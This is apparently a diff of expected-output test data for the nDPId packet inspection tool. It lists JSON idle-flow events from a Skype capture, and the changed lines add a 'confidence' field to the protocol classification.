+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.155","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.145","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.176","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.153","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":51066,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748262,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
